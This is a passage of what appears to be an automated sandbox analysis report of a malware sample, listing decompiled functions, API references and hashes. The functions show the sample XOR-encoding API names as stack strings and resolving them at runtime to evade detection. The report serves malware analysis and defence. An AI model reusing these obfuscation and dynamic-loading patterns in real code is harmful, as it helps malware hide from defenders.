                                                                    0x0041d0fd
                                                                    0x0041d10e
                                                                    0x0041d10e
                                                                    0x0041d122
                                                                    0x0041d127

                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(?,?,?,80000000,0000FFB9,?,00447B7C,?,?,?,?,?,?,?,0041F71F,?), ref: 0041D122
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ManagerOpen
                                                                    • String ID: K$U$Y$[$h$j
                                                                    • API String ID: 1889721586-3439934199
                                                                    • Opcode ID: f0bffc2de1e2e0f648bbca4067eedd5324fef01a4a6821828f74599e1ab0985d
                                                                    • Instruction ID: d79afe7a9d57b16d3910075a61d7c4bb3053336fc548d9e1ccbd50dab9dca52a
                                                                    • Opcode Fuzzy Hash: f0bffc2de1e2e0f648bbca4067eedd5324fef01a4a6821828f74599e1ab0985d
                                                                    • Instruction Fuzzy Hash: 2501E56550C3C0AED302DB78984469BBFD15BA2248F18CC9DE4E887253D679854AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041E150(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t21;
                                                                    				void* _t23;
                                                                    				CHAR* _t30;
                                                                    
                                                                    				_t20 =  *0x447fe8;
                                                                    				if(_t20 == 0) {
                                                                    					_v11 = 0x62;
                                                                    					_v7 = 0x62;
                                                                    					_v5 = 0x62;
                                                                    					 *_t30 = 0x50;
                                                                    					_v15 = 0x54;
                                                                    					_v14 = 0x46;
                                                                    					_v13 = 0x42;
                                                                    					_v12 = 0x71;
                                                                    					_v10 = 0x69;
                                                                    					_v9 = 0x73;
                                                                    					_v8 = 0x54;
                                                                    					_v6 = 0x6b;
                                                                    					_v4 = 0x64;
                                                                    					_v3 = 0x73;
                                                                    					_v2 = 7;
                                                                    					_t23 = 0;
                                                                    					do {
                                                                    						 *(_t30 + _t23) =  *(_t30 + _t23) ^ 0x00000007;
                                                                    						_t23 = _t23 + 1;
                                                                    					} while (_t23 < 0xf);
                                                                    					_t20 = E0041DA50(_t30);
                                                                    					 *0x447fe8 = _t20;
                                                                    				}
                                                                    				_t21 =  *_t20(_a4, _a8, _a12); // executed
                                                                    				return _t21;
                                                                    			}





















                                                                    0x0041e150
                                                                    0x0041e15a
                                                                    0x0041e162
                                                                    0x0041e166
                                                                    0x0041e16a
                                                                    0x0041e16e
                                                                    0x0041e172
                                                                    0x0041e176
                                                                    0x0041e17b
                                                                    0x0041e180
                                                                    0x0041e185
                                                                    0x0041e18a
                                                                    0x0041e18e
                                                                    0x0041e192
                                                                    0x0041e197
                                                                    0x0041e19c
                                                                    0x0041e1a0
                                                                    0x0041e1a5
                                                                    0x0041e1a7
                                                                    0x0041e1a7
                                                                    0x0041e1ab
                                                                    0x0041e1ac
                                                                    0x0041e1b5
                                                                    0x0041e1bd
                                                                    0x0041e1bd
                                                                    0x0041e1d1
                                                                    0x0041e1d6

                                                                    APIs
                                                                    • WSAEventSelect.WS2_32(?,?,?,00000000), ref: 0041E1D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: EventSelect
                                                                    • String ID: B$F$d$i$k$q
                                                                    • API String ID: 31538577-3112116743
                                                                    • Opcode ID: 4302f4ac449ebbc8b546cc33188ac507f014c3b68b7802e46f2c28f6d1cb5552
                                                                    • Instruction ID: ad756c14d81518748bb946640199fca0d27cd64799b278dfd8ba38c723f452f1
                                                                    • Opcode Fuzzy Hash: 4302f4ac449ebbc8b546cc33188ac507f014c3b68b7802e46f2c28f6d1cb5552
                                                                    • Instruction Fuzzy Hash: 6901056550C3C0AEE302DB789484A9BBFD55BB2208F48CC9DE4D887293D2BAC549C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041BFA0(void* _a4, struct _WIN32_FIND_DATAA* _a8) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				int _t19;
                                                                    				void* _t21;
                                                                    				CHAR* _t28;
                                                                    
                                                                    				if( *0x447eb0 == 0) {
                                                                    					_v11 = 0x27;
                                                                    					_v5 = 0x27;
                                                                    					 *_t28 = 4;
                                                                    					_v15 = 0x2b;
                                                                    					_v14 = 0x2c;
                                                                    					_v13 = 0x26;
                                                                    					_v12 = 0xc;
                                                                    					_v10 = 0x3a;
                                                                    					_v9 = 0x36;
                                                                    					_v8 = 4;
                                                                    					_v7 = 0x2b;
                                                                    					_v6 = 0x2e;
                                                                    					_v4 = 3;
                                                                    					_v3 = 0x42;
                                                                    					_t21 = 0;
                                                                    					do {
                                                                    						 *(_t28 + _t21) =  *(_t28 + _t21) ^ 0x00000042;
                                                                    						_t21 = _t21 + 1;
                                                                    					} while (_t21 < 0xe);
                                                                    					 *0x447eb0 = E0041A600(_t28);
                                                                    				}
                                                                    				_t19 = FindNextFileA(_a4, _a8); // executed
                                                                    				return _t19;
                                                                    			}



















                                                                    0x0041bfaa
                                                                    0x0041bfb2
                                                                    0x0041bfb6
                                                                    0x0041bfba
                                                                    0x0041bfbd
                                                                    0x0041bfc1
                                                                    0x0041bfc6
                                                                    0x0041bfcb
                                                                    0x0041bfd0
                                                                    0x0041bfd5
                                                                    0x0041bfda
                                                                    0x0041bfde
                                                                    0x0041bfe2
                                                                    0x0041bfe7
                                                                    0x0041bfec
                                                                    0x0041bff1
                                                                    0x0041bff3
                                                                    0x0041bff3
                                                                    0x0041bff7
                                                                    0x0041bff8
                                                                    0x0041c009
                                                                    0x0041c009
                                                                    0x0041c018
                                                                    0x0041c01d

                                                                    APIs
                                                                    • FindNextFileA.KERNELBASE(?,?,?,00406B05,?,?,BBBBBCF2), ref: 0041C018
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindNext
                                                                    • String ID: &$,$.$6$:$B
                                                                    • API String ID: 2029273394-413768507
                                                                    • Opcode ID: b1044a19fd9aa4684070b5433e945678061ab51e4004e8c84e23c68d2988bb18
                                                                    • Instruction ID: 06328519ea88742b88059d961ef61051c8ffe33666c8bc8159f5f29c75978b51
                                                                    • Opcode Fuzzy Hash: b1044a19fd9aa4684070b5433e945678061ab51e4004e8c84e23c68d2988bb18
                                                                    • Instruction Fuzzy Hash: C8010C6510C3C0AEE312EB78958874BBFD55BB2248F48DC9DE0D887243D2BAD549C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041ACD0(void* _a4, long _a8, long _a12) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t24;
                                                                    
                                                                    				if( *0x447df4 == 0) {
                                                                    					_v7 = 0x34;
                                                                    					_v6 = 0x34;
                                                                    					 *_t24 = 0x10;
                                                                    					_v11 = 0x3d;
                                                                    					_v10 = 0x39;
                                                                    					_v9 = 0x28;
                                                                    					_v8 = 0x19;
                                                                    					_v5 = 0x37;
                                                                    					_v4 = 0x3b;
                                                                    					_v3 = 0x58;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t24 + _t18) =  *(_t24 + _t18) ^ 0x00000058;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xa);
                                                                    					 *0x447df4 = E0041A600(_t24);
                                                                    				}
                                                                    				_t16 = RtlAllocateHeap(_a4, _a8, _a12); // executed
                                                                    				return _t16;
                                                                    			}















                                                                    0x0041acda
                                                                    0x0041acde
                                                                    0x0041ace2
                                                                    0x0041ace6
                                                                    0x0041acea
                                                                    0x0041acef
                                                                    0x0041acf4
                                                                    0x0041acf9
                                                                    0x0041acfe
                                                                    0x0041ad03
                                                                    0x0041ad08
                                                                    0x0041ad0d
                                                                    0x0041ad10
                                                                    0x0041ad10
                                                                    0x0041ad14
                                                                    0x0041ad15
                                                                    0x0041ad26
                                                                    0x0041ad26
                                                                    0x0041ad3a
                                                                    0x0041ad3f

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00447B68,?,00000001), ref: 0041AD3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: ($7$9$;$=$X
                                                                    • API String ID: 1279760036-3331253663
                                                                    • Opcode ID: e40c0d4991134628340334a6122d947139d50196280383b841fb72cb1d3ef8be
                                                                    • Instruction ID: 68a1602569ac716cfebf445b28d72d2d603e3db6222b54e77429e6ee4904ab1e
                                                                    • Opcode Fuzzy Hash: e40c0d4991134628340334a6122d947139d50196280383b841fb72cb1d3ef8be
                                                                    • Instruction Fuzzy Hash: CA012CA450D3C09DE302DB68E544B5BBFD55BA2308F44C86EE4C987242D679C559C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041DB30(intOrPtr _a4, intOrPtr _a8) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr* _t15;
                                                                    				void* _t16;
                                                                    				void* _t19;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				_t15 =  *0x447fb4;
                                                                    				if(_t15 == 0) {
                                                                    					_v11 = 0x65;
                                                                    					_v9 = 0x65;
                                                                    					_v8 = 0x42;
                                                                    					_v5 = 0x42;
                                                                    					 *_t23 = 0x61;
                                                                    					_v10 = 0x77;
                                                                    					_v7 = 0x57;
                                                                    					_v6 = 0x44;
                                                                    					_v4 = 0x43;
                                                                    					_v3 = 0x46;
                                                                    					_v2 = 0x36;
                                                                    					_t19 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t19) =  *(_t23 + _t19) ^ 0x00000036;
                                                                    						_t19 = _t19 + 1;
                                                                    					} while (_t19 < 0xb);
                                                                    					_t15 = E0041DA50(_t23);
                                                                    					 *0x447fb4 = _t15;
                                                                    				}
                                                                    				_t16 =  *_t15(_a4, _a8); // executed
                                                                    				return _t16;
                                                                    			}

















                                                                    0x0041db30
                                                                    0x0041db3a
                                                                    0x0041db3e
                                                                    0x0041db42
                                                                    0x0041db48
                                                                    0x0041db4c
                                                                    0x0041db50
                                                                    0x0041db54
                                                                    0x0041db59
                                                                    0x0041db5e
                                                                    0x0041db63
                                                                    0x0041db68
                                                                    0x0041db6d
                                                                    0x0041db72
                                                                    0x0041db74
                                                                    0x0041db74
                                                                    0x0041db78
                                                                    0x0041db79
                                                                    0x0041db82
                                                                    0x0041db8a
                                                                    0x0041db8a
                                                                    0x0041db99
                                                                    0x0041db9e

                                                                    APIs
                                                                    • WSAStartup.WS2_32(?,?,004137BF,00000202,?), ref: 0041DB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID: 6$C$D$F$W$w
                                                                    • API String ID: 724789610-4113399473
                                                                    • Opcode ID: 7d64444f0f042771cf6964d227c473a31e0447265047d8a8b8baa1fff05cbbe7
                                                                    • Instruction ID: d8f1b90ae1977f7cc31951f029ce94c1c51e9c332bf24e8b2bfd88e840ca6c12
                                                                    • Opcode Fuzzy Hash: 7d64444f0f042771cf6964d227c473a31e0447265047d8a8b8baa1fff05cbbe7
                                                                    • Instruction Fuzzy Hash: 08014BA140C3C0AED302DB78950475BBFE51BA2248F08C8ADE4D887243E2B9D60CC377
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E0042A152(void* __edi) {
                                                                    				char _v8;
                                                                    				signed char _v11;
                                                                    				signed char _v12;
                                                                    				signed char _v13;
                                                                    				signed char _v14;
                                                                    				signed char _v15;
                                                                    				signed char _v16;
                                                                    				signed char _v17;
                                                                    				signed char _v18;
                                                                    				signed char _v19;
                                                                    				signed char _v20;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v45;
                                                                    				char _v46;
                                                                    				char _v47;
                                                                    				char _v48;
                                                                    				char _v49;
                                                                    				char _v50;
                                                                    				char _v51;
                                                                    				char _v52;
                                                                    				char _v53;
                                                                    				char _v54;
                                                                    				char _v55;
                                                                    				char _v56;
                                                                    				char _v57;
                                                                    				char _v58;
                                                                    				char _v59;
                                                                    				char _v60;
                                                                    				char _v61;
                                                                    				char _v62;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				char _v65;
                                                                    				char _v66;
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				char _v69;
                                                                    				char _v70;
                                                                    				char _v71;
                                                                    				char _v72;
                                                                    				char _v73;
                                                                    				char _v74;
                                                                    				char _v75;
                                                                    				char _v76;
                                                                    				void* _t82;
                                                                    				void* _t83;
                                                                    				char _t86;
                                                                    				void* _t90;
                                                                    				int _t103;
                                                                    				CHAR* _t107;
                                                                    				void* _t109;
                                                                    
                                                                    				_v76 = 0x9b;
                                                                    				_v75 = 0x8e;
                                                                    				_v74 = 0x8c;
                                                                    				_v73 = 0xe6;
                                                                    				_v72 = 0x9b;
                                                                    				_v71 = 0x8e;
                                                                    				_v70 = 0x8c;
                                                                    				_v69 = 0xe6;
                                                                    				_v68 = 0x9b;
                                                                    				_v67 = 0x8e;
                                                                    				_v66 = 0x8c;
                                                                    				_v65 = 0xe6;
                                                                    				_v64 = 0x9b;
                                                                    				_v63 = 0x8e;
                                                                    				_v62 = 0x8c;
                                                                    				_v61 = 0xe6;
                                                                    				_v60 = 0x9b;
                                                                    				_v59 = 0x8e;
                                                                    				_v58 = 0x8c;
                                                                    				_v57 = 0xe6;
                                                                    				_v56 = 0x9b;
                                                                    				_v55 = 0x8e;
                                                                    				_v54 = 0x8c;
                                                                    				_v53 = 0xe6;
                                                                    				_v52 = 0x9b;
                                                                    				_v51 = 0x8e;
                                                                    				_v50 = 0x8c;
                                                                    				_v49 = 0xe6;
                                                                    				_v48 = 0x9b;
                                                                    				_v47 = 0x8e;
                                                                    				_v46 = 0x8c;
                                                                    				_v45 = 0xe6;
                                                                    				_v44 = 0x9b;
                                                                    				_v43 = 0x8e;
                                                                    				_v42 = 0x8c;
                                                                    				_v41 = 0xe6;
                                                                    				_v40 = 0x9b;
                                                                    				_v39 = 0x8e;
                                                                    				_v38 = 0x8c;
                                                                    				_v37 = 0xe6;
                                                                    				_v36 = 0xbe;
                                                                    				_t82 = 0;
                                                                    				do {
                                                                    					 *(_t109 + _t82 - 0x48) =  *(_t109 + _t82 - 0x48) ^ 0x000000be;
                                                                    					_t82 = _t82 + 1;
                                                                    				} while (_t82 < 0x29);
                                                                    				_v32 = 0xd;
                                                                    				_v31 = 0x38;
                                                                    				_v30 = 0xef;
                                                                    				_v29 = 0xe8;
                                                                    				_v28 = 0xeb;
                                                                    				_v27 = 0x7f;
                                                                    				_v26 = 0x12;
                                                                    				_v25 = 0x3b;
                                                                    				_v24 = 0x7b;
                                                                    				_v23 = 0x49;
                                                                    				_v22 = 0x57;
                                                                    				_t83 = 0;
                                                                    				do {
                                                                    					 *(_t109 + _t83 - 0x1c) =  *(_t109 + _t83 - 0x1c) ^ 0x00000057;
                                                                    					_t83 = _t83 + 1;
                                                                    					_t116 = _t83 - 0xb;
                                                                    				} while (_t83 < 0xb);
                                                                    				E0042A50E(_t116,  &_v20); // executed
                                                                    				_t86 = E0042A0F8(__edi); // executed
                                                                    				_v8 = _t86;
                                                                    				E0041A2F0( &_v14,  &_v8, 4);
                                                                    				_t90 = 0;
                                                                    				do {
                                                                    					_t66 = _t90 - 0x1c; // 0x57
                                                                    					 *(_t109 + _t90 - 0x10) =  *(_t109 + _t90 - 0x10) ^  *(_t109 + _t66);
                                                                    					_t90 = _t90 + 1;
                                                                    				} while (_t90 < 0xa);
                                                                    				_push(0x20);
                                                                    				_push(0);
                                                                    				_t107 = "A590474043D7B82B05D3";
                                                                    				_push(_t107);
                                                                    				E0041A330();
                                                                    				_t103 = wsprintfA(_t107,  &_v76, _v20 & 0x000000ff, _v19 & 0x000000ff, _v18 & 0x000000ff, _v17 & 0x000000ff, _v16 & 0x000000ff, _v15 & 0x000000ff, _v14 & 0x000000ff, _v13 & 0x000000ff, _v12 & 0x000000ff, _v11 & 0x000000ff);
                                                                    				 *0x4485cc = 1;
                                                                    				return _t103;
                                                                    			}









































































                                                                    0x0042a158
                                                                    0x0042a15c
                                                                    0x0042a160
                                                                    0x0042a164
                                                                    0x0042a168
                                                                    0x0042a16c
                                                                    0x0042a170
                                                                    0x0042a174
                                                                    0x0042a178
                                                                    0x0042a17c
                                                                    0x0042a180
                                                                    0x0042a184
                                                                    0x0042a188
                                                                    0x0042a18c
                                                                    0x0042a190
                                                                    0x0042a194
                                                                    0x0042a198
                                                                    0x0042a19c
                                                                    0x0042a1a0
                                                                    0x0042a1a4
                                                                    0x0042a1a8
                                                                    0x0042a1ac
                                                                    0x0042a1b0
                                                                    0x0042a1b4
                                                                    0x0042a1b8
                                                                    0x0042a1bc
                                                                    0x0042a1c0
                                                                    0x0042a1c4
                                                                    0x0042a1c8
                                                                    0x0042a1cc
                                                                    0x0042a1d0
                                                                    0x0042a1d4
                                                                    0x0042a1d8
                                                                    0x0042a1dc
                                                                    0x0042a1e0
                                                                    0x0042a1e4
                                                                    0x0042a1e8
                                                                    0x0042a1ec
                                                                    0x0042a1f0
                                                                    0x0042a1f4
                                                                    0x0042a1f8
                                                                    0x0042a1fc
                                                                    0x0042a1fe
                                                                    0x0042a1fe
                                                                    0x0042a203
                                                                    0x0042a204
                                                                    0x0042a209
                                                                    0x0042a20d
                                                                    0x0042a211
                                                                    0x0042a215
                                                                    0x0042a219
                                                                    0x0042a21d
                                                                    0x0042a221
                                                                    0x0042a225
                                                                    0x0042a229
                                                                    0x0042a22d
                                                                    0x0042a231
                                                                    0x0042a235
                                                                    0x0042a237
                                                                    0x0042a237
                                                                    0x0042a23c
                                                                    0x0042a23d
                                                                    0x0042a23d
                                                                    0x0042a246
                                                                    0x0042a24b
                                                                    0x0042a250
                                                                    0x0042a25d
                                                                    0x0042a265
                                                                    0x0042a267
                                                                    0x0042a267
                                                                    0x0042a26b
                                                                    0x0042a26f
                                                                    0x0042a270
                                                                    0x0042a276
                                                                    0x0042a278
                                                                    0x0042a27a
                                                                    0x0042a27f
                                                                    0x0042a280
                                                                    0x0042a2bc
                                                                    0x0042a2c5
                                                                    0x0042a2d1

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: wsprintf
                                                                    • String ID: ;$A590474043D7B82B05D3$I$W$W8${
                                                                    • API String ID: 2111968516-2157753265
                                                                    • Opcode ID: ceb9cfa31144c72a7ca2efa2830b28e4d98373a21d23ab54efde03cd168155c0
                                                                    • Instruction ID: d996e3b57ca9209595c516a79e3a470eab00dd9d48bba1cc89126b986db19356
                                                                    • Opcode Fuzzy Hash: ceb9cfa31144c72a7ca2efa2830b28e4d98373a21d23ab54efde03cd168155c0
                                                                    • Instruction Fuzzy Hash: B451C910818BDE9DCB32D6FC5D485DEBF640A2B134F480789F5F1BA2E2D2584206D7BA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041F2B0(void* __ecx) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				intOrPtr _t37;
                                                                    				struct HINSTANCE__* _t41;
                                                                    				_Unknown_base(*)()* _t43;
                                                                    				intOrPtr _t44;
                                                                    				void* _t51;
                                                                    				void* _t52;
                                                                    
                                                                    				_t52 =  &_v24;
                                                                    				_v15 = 0xa5;
                                                                    				_v6 = 0xa5;
                                                                    				_v5 = 0xa5;
                                                                    				_t51 = __ecx;
                                                                    				_v24 = 0x43;
                                                                    				_v23 = 0x42;
                                                                    				_v22 = 0x54;
                                                                    				_v21 = 0x50;
                                                                    				_v20 = 0x72;
                                                                    				_v19 = 0x6f;
                                                                    				_v18 = 0x63;
                                                                    				_v17 = 0;
                                                                    				_v16 = 0xab;
                                                                    				_v14 = 0xa8;
                                                                    				_v13 = 0xaa;
                                                                    				_v12 = 0xbc;
                                                                    				_v11 = 0xba;
                                                                    				_v10 = 0xbb;
                                                                    				_v9 = 0xbf;
                                                                    				_v8 = 0xe7;
                                                                    				_v7 = 0xad;
                                                                    				_v4 = 0xc9;
                                                                    				_t37 = 0;
                                                                    				do {
                                                                    					 *(_t52 + _t37 + 0x10) =  *(_t52 + _t37 + 0x10) ^ 0x000000c9;
                                                                    					_t37 = _t37 + 1;
                                                                    				} while (_t37 < 0xd);
                                                                    				_t26 = _t51 + 0x17c; // 0x1
                                                                    				_t50 = 1;
                                                                    				if( *_t26 == 0) {
                                                                    					_t27 = _t51 + 0x1c; // 0x0
                                                                    					if( *_t27 == 0 ||  *((intOrPtr*)(__ecx + 4)) <= 5) {
                                                                    						_t41 = LoadLibraryA( &_v16); // executed
                                                                    						 *(_t51 + 0x170) = _t41;
                                                                    						if(_t41 == 0) {
                                                                    							goto L8;
                                                                    						} else {
                                                                    							_t31 =  &_v24; // 0x43
                                                                    							_t43 = GetProcAddress(_t41, _t31);
                                                                    							 *(_t51 + 0x174) = _t43;
                                                                    							if(_t43 != 0) {
                                                                    								_t33 = _t51 + 0x170; // 0x10000000
                                                                    								_t44 = E0041E780(5, _t43,  *_t33, 0);
                                                                    								 *((intOrPtr*)(_t51 + 0x178)) = _t44;
                                                                    								if(_t44 == 0) {
                                                                    									_t50 = 0;
                                                                    								}
                                                                    								 *((intOrPtr*)(_t51 + 0x17c)) = _t50;
                                                                    								return _t50;
                                                                    							} else {
                                                                    								goto L8;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						L8:
                                                                    						return 0;
                                                                    					}
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}






























                                                                    0x0041f2b0
                                                                    0x0041f2b6
                                                                    0x0041f2ba
                                                                    0x0041f2be
                                                                    0x0041f2c3
                                                                    0x0041f2c5
                                                                    0x0041f2ca
                                                                    0x0041f2cf
